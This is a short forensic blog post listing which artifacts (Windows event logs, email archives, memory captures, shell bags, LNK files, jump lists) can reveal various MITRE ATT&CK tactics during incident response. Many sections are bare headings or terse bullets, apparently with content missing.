Artifacts and ATT&CK

A dive into the different types of artifacts to look for in line with the MITRE | ATT&CK framework.

What artifacts should we be looking for when carrying out forensic analysis on servers or hosts involved in an incident response engagement? Below we will walk through the different tactics from the ATT&CK frame work, some of the main types of techniques used and what artifacts we can look for to build the picture of what, when and how an attack has occurred.

There are 14 tactics outlined in the ATT&CK framework but I will be writing about the ones I find most useful for now and may add on other phases at a later date. A further note is there are a number of techniques not spoken about here as I am focusing on common techniques I have come across.

Initial Access

The adversary is trying to get into your network.

Phishing

Manual inspection of emails with suspicious titles, senders and attachments.

Parse the PST file if the client is using Outlook or otherwise identify the email client and what type of email backup is used and parse to examine.

External Remote Services

Services such as RDP (Remote Desktop Protocol), SSH (Secure Shell), and SMB (Server Message Block) if externally exposed can easily be identified via external reconnaissance by attackers which can be targeted with brute-forcing, dictionary attacks or known credentials identified through other means.

  • Windows Event Logs.

Execution

The adversary is trying to run malicious code.

Command and Scripting Interpreter

PowerShell on Windows devices is used commonly by attackers to execute tactics they want to carry out such as download tools, enumerate networks and accounts used within an environment. You can identify this activity with artifacts from windows event log such as:

  • Windows Event Logs.

Scheduled Task/Job

  • Windows Event Logs.

Persistence

The adversary is trying to maintain their foothold.

Create or Modify System Process

  • Identify processes created/modified on disk within incident timeline (name may differ slightly from original trying to mirror a normal process name i.e. scvhost.exe instead of the original svchost.exe).

BITS Jobs

  • Windows Event Logs.

Privilege Escalation

The adversary is trying to gain higher-level permissions.

Process Injection

  • Use Volatility tool if RAM capture is available with plugins for detecting process injection.

Defense Evasion

The adversary is trying to avoid being detected.

Group Policy Modification

Credential Access

The adversary is trying to steal account names and passwords

Brute Force

  • Windows Event Logs.

Discovery

The adversary is trying to figure out your environment.

Account Discovery

File and Directory Discovery

  • Shell Bags.

  • LNK Files.

  • Jump Lists.

Lateral Movement

The adversary is trying to move through your environment.

Remote Services

Collection

The adversary is trying to gather data of interest to their goal.

Data from Local System

Data from Network Shared Drive

Email Collection

Command and Control

The adversary is trying to communicate with compromised systems to control them.

Data Encoding

Non-Standard Port

  • Windows Event Log

Exfiltration

The adversary is trying to steal data.

Automated Exfiltration